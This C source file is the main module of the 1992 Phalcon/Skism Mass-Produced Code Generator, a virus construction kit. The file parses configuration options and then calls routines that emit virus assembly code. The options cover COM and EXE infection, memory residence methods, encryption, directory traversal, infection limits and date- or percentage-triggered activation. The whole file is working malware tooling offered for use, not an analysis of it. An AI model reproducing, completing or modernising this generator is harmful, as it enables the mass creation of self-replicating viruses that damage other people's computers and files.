/* FILE: VMAIN.C */
/* The Phalcon/Skism Mass-Produced Code Generator *
 * Version 0.91 - 17 Aug 92                      *
 * Written by Dark Angel of Phalcon/Skism         *
 */

#include <stdio.h>

#define MAIN
#include "vheader.h"
#undef MAIN

globals config;

void parse_config(void);
unsigned getnumber(int line, char *d, char ok, char *next);
char getyn(int line, char *d);
void setplusminus(char *a, char b);
void parseactivate(int line, char *d, char min, char max, char *a, char *b,char *s);
void printerror(int line, char c);
void getDBname(char *orig, char *name,char *delim);
void getword(char *word,char *d);

FILE *fp;

void main(int argc, char **argv)
{
  char c,filename[80];

  puts("PS-MPC  Phalcon/Skism Mass Produced Code Generator");
  puts("        Version 0.91        Written by Dark Angel\n");

  if (argc < 2)
  {
    puts("Syntax: PS-MPC <file1> <file2> ...");
    puts("  file1 = name of first configuration file");
    puts("  file2 = name of second configuration file");
  }

  for (c=1;c<argc;c++)
  {
    if ((fp = fopen(argv[c],"rt")) == NULL)
    {
      printf("Error opening configuration file (%s).\n",argv[c]);
      puts("Skipping file...");
      continue;
    }

    printf("Reading configuration file (%s)...",argv[c]);
    resetheap();
    parse_config();
    strcpy(config.configfilename,argv[c]);

    fclose(fp);
    puts("Done!");

    if (!config.p.infectCOM && !config.p.infectEXE) {
      puts("Warning: Virus does not infect any type of file.");
      puts("Remedy:  Use the \"infect\" parameter in the configuration file.");
      puts("Skipping file...");
      continue;
    }

    if (!config.asmfilename[0]) {
      puts("Warning: No target file name specified.");
      puts("Remedy:  Use the \"filename\" parameter in the configuration file.");
      puts("Skipping file...");
      continue;
    }

    if ((fp = fopen(config.asmfilename,"wt")) == NULL)
    {
      printf("Error opening target file (%s).\n",config.asmfilename);
      puts("Skipping file...");
      continue;
    }

    printf("Creating target file (%s)...",config.asmfilename);

    code_header();
    code_encryption();
    code_setup();
    code_traversal();
    code_check_activation();
    code_return();
    code_activate();
    code_messages();
    if (config.p.resident)
      code_handler();
    if (config.p.calls_check)
      code_check();
    code_infect();
    code_subroutines();
    code_variables();
    code_heap();
    code_tail();

    fclose(fp);
    puts("Done!");
  }
  puts("\nThank you for using the Phalcon/Skism Mass Produced Code Generator");
  exit(0);
}

void print(char *s, char *t)
{
  char b[128];
  sprintf(b,"          %s",s);
  printlabel(b,t);
}

void printlabel(char *s, char *t)
{
  int i = 0;
  if (*s)
    if (*t) {
      i = fprintf(fp,"%-40s",s);
      if (i > 40)
        fputc(' ',fp);
      fprintf(fp,"; %s",t);
    } else /* if (*t) */
      fprintf(fp,s);
  fprintf(fp,"\n");
}

void addvar(char *s, char *t, char *u)
{
  char b[128];
  if (*u)
    sprintf(b,"%-10.10s%-30s; %s",s,t,u);
  else
    sprintf(b,"%-10.10s%s",s,t);
  printlabel(b,"");
}

void parse_config(void)
{
    char b[128];
    char *c, *d;
    int  line = 0;
    globals default_globals = {
        "",                            /* Configuration file name         */
        "",                            /* Source code file name           */
        "  ",                          /* EXE ID Word                     */
        "DA",                          /* Resident ID Word 1              */
        "PS",                          /* Resident ID Word 2              */
        "",                            /* Virus name                      */
        '\'',                          /* Deliminator for virus name      */
        "",                            /* Author name                     */
        '\'',                          /* Deliminator for author name     */
        0,                             /* Minimum COM size for infection  */
        0,                             /* Maximum COM size for infection  */
        0,                             /* Infections per run              */
        { 0,0,0,INTERRUPTS,NONE,0,0,0,
          0,1,1,0,0},                  /* flags                           */
        0,                             /* xor value                       */
        "",                            /* xor comment                     */
        0,                             /* number of activation conditions */
        { 0,0,0,0,0,127,0,127,127,127,0 }, /* activation conditions       */
        { 0,0,0,0,0, 0,0, 0, 0, 0,-1}  /* plusminus activation conditions */
    };

    config = default_globals;

    while (1)
    {
        line++;
        b[0]=0;
        c = fgets(b,100,fp);
        if (!b[0])
          break;
        while (isspace(*c)) c++;    /* skip initial spaces */
        if (!*c || *c == ';') continue; /* check if this line is a comment */
        d = c;
        while (!isspace(*d)) d++;   /* isolate one word  */
        *d++ = 0;                   /* NULL terminate it */
        while (isspace(*d) || (*d == '=')) d++;

        if (!stricmp(c,"filename"))
        {
          c = d;
          while (!isspace(*d)) d++; /* isolate filename */
          *d = 0;
          strcpy(config.asmfilename,c);
        }

        else if (!stricmp(c,"traversal"))
          switch (toupper(*d))
          {
            case 'N' : config.p.traverse = NONE; break;
            case 'D' : config.p.traverse = DOT_DOT; break;
            default  : printerror(line,*d);
          }

        else if (!stricmp(c,"encryption")) config.p.encrypt = getyn(line,d);

        else if (!stricmp(c,"resident")) config.p.resident = getyn(line,d);

        else if (!stricmp(c,"resmethod"))
          switch (toupper(*d))
          {
            case 'I' : config.p.resmethod = INTERRUPTS;   break;
            case 'D' : config.p.resmethod = DIRECTMANIP;  break;
            case 'B' : config.p.resmethod = BIOS;         break;
            default  : printerror(line,*d);
          }

        else if (!stricmp(c,"infect"))
          while (!isspace(*d)) {
            switch (toupper(*d))
            {
              case 'C' : config.p.infectCOM = 1; break;
              case 'E' : config.p.infectEXE = 1; break;
              case ',' : break;
              default  : printerror(line,*d);
            }
            d++;
          }

        else if (!stricmp(c,"idword"))
          getword(config.id,d);

        else if  (!stricmp(c,"resid")) {
          getword(config.intid[0],d);
          getword(config.intid[1],d+3);
        }

        else if (!stricmp(c,"minsize")) {
          if (toupper(*d) == 'A')
            config.minsize = 1;
          else {
            config.minsize = getnumber(line,d,0,0);
            if (config.maxsize > 1)
              if (config.minsize > config.maxsize)
                puts("Error: minsize is greater than maxsize!");
          }
        }

        else if (!stricmp(c,"maxsize")) {
          if (toupper(*d) == 'A')
            config.maxsize = 1;
          else {
            config.maxsize = getnumber(line,d,0,0);
            if (config.minsize > 1)
              if (config.maxsize < config.minsize)
                printf("Error: minsize is greater than maxsize!\n");
          }
        }

        else if (!stricmp(c,"infections"))
          config.maxinfect = (unsigned char)getnumber(line,d,0,0);

        else if (!stricmp(c,"errorhandler"))
          config.p.int24 = getyn(line,d);

        else if (!stricmp(c,"commandcom"))
          config.p.CommandCom = getyn(line,d);

        else if (!stricmp(c,"virusname"))
          getDBname(d,config.virusname,&config.virusnamedelim);

        else if (!stricmp(c,"authorname"))
          getDBname(d,config.authorname,&config.authornamedelim);

        else if (!stricmp(c,"allowzero"))
          config.p.allowzero = getyn(line,d);

        else if (!stricmp(c,"always")) {
          config.activate.always = getyn(line,d);
          if (config.activate.always) config.activation++;
        }

        else if (!stricmp(c,"ifmonth"))
          parseactivate(line,d,1,12,&config.activate.month,&config.plusminus.month,"month");

        else if (!stricmp(c,"ifday"))
          parseactivate(line,d,1,31,&config.activate.day,&config.plusminus.day,"day");

        else if (!stricmp(c,"ifyear"))
        {
          config.activate.year = getnumber(line,d,'+',d);
          setplusminus((char *)&config.plusminus.year,*d);
          config.activation++;
        }

        else if (!stricmp(c,"ifdow"))
          parseactivate(line,d,0,6,&config.activate.dow,&config.plusminus.dow,"date of week");

        else if (!stricmp(c,"ifmonthday"))
        {
          int  tempint;
          char temp=(char)getnumber(line,d,',',d);
          if ((temp < 1) || (temp > 12))
            printf("Invalid month: %d.  Must range between 1 and 12.\n",temp);
          else {
            d++;
            tempint = temp*0x100;
            temp=(char)getnumber(line,d,'+',d);
            if ((temp < 1) || (temp > 31))
            {
              printf("Invalid day: %d.  Must range between 1 and 31.\n",temp);
            } else {
              config.activate.monthday=tempint + temp;
              setplusminus((char *)&config.plusminus.monthday,*d);
              config.activation++;
            }
          }
        }

        else if (!stricmp(c,"ifhour"))
          parseactivate(line,d,0,23,&config.activate.hour,&config.plusminus.hour,"hour");

        else if (!stricmp(c,"ifminute"))
          parseactivate(line,d,0,59,&config.activate.minute,&config.plusminus.minute,"minute");

        else if (!stricmp(c,"ifsecond"))
          parseactivate(line,d,0,59,&config.activate.second,&config.plusminus.second,"second");

        else if (!stricmp(c,"percentage"))
          parseactivate(line,d,1,99,&config.activate.percentage,0,"percentage");

        else if (!isspace(c))
          printf("Error in line %d: Invalid parameter '%s'.\n",line,c);
    }
}

unsigned int getnumber(int line,char *d,char ok,char *next)
{
  int temp = 0;
  while (isdigit(*d))
  {
    temp*=10;
    temp+=(*d-'0');
    d++;
  }
  if ((ok == '+') && (!((*d == '+') || (*d == '-'))) && !isspace(*d))
    printerror(line,*d);
  else
    if (next) *next=*d;
  return temp;
}

char getyn(int line,char *d)
{
  switch (toupper(*d))
  {
    case 'Y' : return 1;
    case 'N' : return 0;
    default  : printerror(line,*d);
  }
  return 0;
}

void setplusminus(char *a, char b)
{
    if (b == '+')
      *a = 1;
    else if (b == '-')
      *a = 2;
    else
      *a = 0;
}

void parseactivate(int line, char *d, char min, char max, char *a, char *b, char *s)
{
  char *c=d;
  char temp = (char)getnumber(line,d,'+',c);
  if ((temp < min) || (temp > max))
    printf("Invalid %s specified: %d.  Range must be between %d & %d.\n",s,temp,min,max);
  else {
    *a = temp;
    if (b != 0) setplusminus(b,*c);
    config.activation++;
  }
}

void printerror(int line, char c)
{
  printf("Error in line %d: Invalid character '%c'.\n",line,c);
}

void printblank(void)
{
  fprintf(fp,"\n");
}

void getDBname(char *orig, char *name,char *delim)
{
  *delim = '\'';
  orig[strlen(orig)-1] = 0;
  if (strchr(orig,'\''))
    if (strchr(orig,'\"')) {
      *delim = 0;
      printf("Error in %s: Both single and double quotes used.",orig);
    }
    else
      *delim = '\"';
  if (*delim)
    strcpy(name,orig);
}

void getword(char *word,char *d)
{
  word[0] = (isspace(*d)) ? ' ' : *d;
  word[1] = (isspace(*(d+1))) ? ' ' : *(d+1);
  word[2]=0;
}

